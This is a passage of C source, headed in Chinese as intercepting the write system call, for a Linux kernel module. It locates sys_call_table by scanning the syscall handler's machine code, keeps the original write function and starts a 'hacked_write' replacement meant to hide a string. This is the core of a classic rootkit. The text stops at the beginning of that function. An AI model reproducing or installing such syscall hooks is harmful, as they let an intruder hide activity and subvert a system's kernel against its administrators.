1,截获write系统调用:
#ifndef MODULE
#define MODULE
#endif
#ifndef __KERNEL__
#define __KERNEL__
#endif
#include <linux/init.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/kernel.h>
#include <asm/unistd.h>
#include <linux/slab.h>
/*
#include <sys/types.h>
#include <asm/fcntl.h>
#include <linux/malloc.h>
#include <linux/types.h>
#include <linux/string.h>
#include <linux/fs.h>
#include <asm/errno.h>
#include <sys/syscall.h>
*/
MODULE_LICENSE("GPL");
struct descriptor_idt
{
unsigned short offset_low;
unsigned short ignore1;
unsigned short ignore2;
unsigned short offset_high;
};
static struct {
unsigned short limit;
unsigned long base;
}__attribute__ ((packed)) idt48;
static unsigned int SYS_CALL_TABLE_ADDR;
void **sys_call_table;
int base_system_call;
int (*orig_write)(unsigned int fd,char *buf,unsigned int count);
unsigned char opcode_call[3]={0xff,0x14,0x85};
int match(unsigned char *source)
{
int i;
for(i=0;i<3;i++){
if(source[i] != opcode_call[i])
return 0;
}
return 1;
}
int get_sys_call_table(void)
{
int i,j;
unsigned char *ins=(unsigned char *)base_system_call;
unsigned int sct;
for(i=0;i<100;i++){
if(ins[i]==opcode_call[0]){
if(match(ins+i)){
sct=*((unsigned int *)(ins+3+i));
printk(KERN_ALERT "sys_call_tabl's address is
0x%X\n",sct);
return sct;
}
}
}
printk(KERN_ALERT "can't find the address of sys_call_table\n");
return -1;
}
int hacked_write(unsigned int fd,char *buf,unsigned int count)
{
char *hide="hello";